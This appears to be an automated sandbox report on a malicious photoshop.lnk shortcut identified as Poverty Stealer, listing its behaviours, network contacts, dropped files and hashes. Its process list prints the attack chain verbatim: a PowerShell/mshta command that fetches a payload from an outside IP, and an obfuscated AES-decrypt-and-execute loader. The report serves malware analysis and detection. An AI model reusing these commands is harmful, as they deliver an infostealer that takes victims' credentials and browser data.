Analysis Overview
SHA256
704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419
Threat Level: Known bad
The file photoshop.lnk was found to be: Known bad.
Malicious Activity Summary
Poverty Stealer
Detect Poverty Stealer Payload
UAC bypass
Downloads MZ/PE file
Blocklisted process makes network request
UPX packed file
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-04 20:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-04 20:17
Reported
2024-03-04 20:20
Platform
win10v2004-20240226-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Detect Poverty Stealer Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Poverty Stealer
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Lyrufos.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Photoshop_Set-Up.exe = "11001" | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk
C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
start mshta http://91.92.251.35/Downloads/Lar/photoshop
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = '...';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
"C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"
C:\Users\Admin\AppData\Roaming\Lyrufos.exe
"C:\Users\Admin\AppData\Roaming\Lyrufos.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1860
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| NL | 91.92.251.35:80 | 91.92.251.35 | tcp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.251.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 91.92.251.35:80 | 91.92.251.35 | tcp |
| DE | 146.70.169.164:2227 | | tcp |
| US | 8.8.8.8:53 | 164.169.70.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 160.30.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itd2eveg.3wy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4468-0-0x0000023147190000-0x00000231471B2000-memory.dmp
memory/4468-10-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp
memory/4468-11-0x00000231472E0000-0x00000231472F0000-memory.dmp
memory/4468-12-0x00000231472E0000-0x00000231472F0000-memory.dmp
memory/4468-13-0x00000231472E0000-0x00000231472F0000-memory.dmp
memory/4468-16-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2336-33-0x000001C28C120000-0x000001C28C130000-memory.dmp
memory/2336-32-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
memory/2336-34-0x000001C28C120000-0x000001C28C130000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ca1082427d7b2cd417d7c0b7fd95e4e |
| SHA1 | b0482ff5b58ffff4f5242d77330b064190f269d3 |
| SHA256 | 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f |
| SHA512 | bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3 |
memory/2336-36-0x000001C28C120000-0x000001C28C130000-memory.dmp
memory/4932-46-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
memory/4932-48-0x0000018320040000-0x0000018320050000-memory.dmp
memory/4932-47-0x0000018320040000-0x0000018320050000-memory.dmp
memory/4932-49-0x000001833A6C0000-0x000001833A704000-memory.dmp
memory/4932-50-0x000001833AAF0000-0x000001833AB66000-memory.dmp
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
| MD5 | c56adb18f4440a6c085141c508256cbd |
| SHA1 | 9ac2fef2d12260c1e717d8de61b8a42840a1cac4 |
| SHA256 | 1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a |
| SHA512 | 4457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429 |
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
| MD5 | b6f4b0ce8d68fa8a3d2ed69a50f4a8da |
| SHA1 | c8037db70d2c53f0efbc746efabf7968d6d09e1a |
| SHA256 | 796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead |
| SHA512 | 7d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2 |
memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp
C:\Users\Admin\AppData\Roaming\Lyrufos.exe
| MD5 | 16db89328ce227006c153728c0ade1ae |
| SHA1 | effd7c2992e64fa2d266b92054d3dee5f1e950f5 |
| SHA256 | 69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab |
| SHA512 | 6e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5 |
memory/4932-71-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
memory/2336-73-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\index.html
| MD5 | a28ab17b18ff254173dfeef03245efd0 |
| SHA1 | c6ce20924565644601d4e0dd0fba9dde8dea5c77 |
| SHA256 | 886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375 |
| SHA512 | 9371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6 |
C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\CCDInstaller.js
| MD5 | e96bb3da47f4a3319b80f23051bdeb16 |
| SHA1 | c9913b052c5c7a59e100fe18357fddc1023161ea |
| SHA256 | d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29 |
| SHA512 | 6ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e |
memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp
memory/3168-102-0x00000000005F0000-0x00000000005F1000-memory.dmp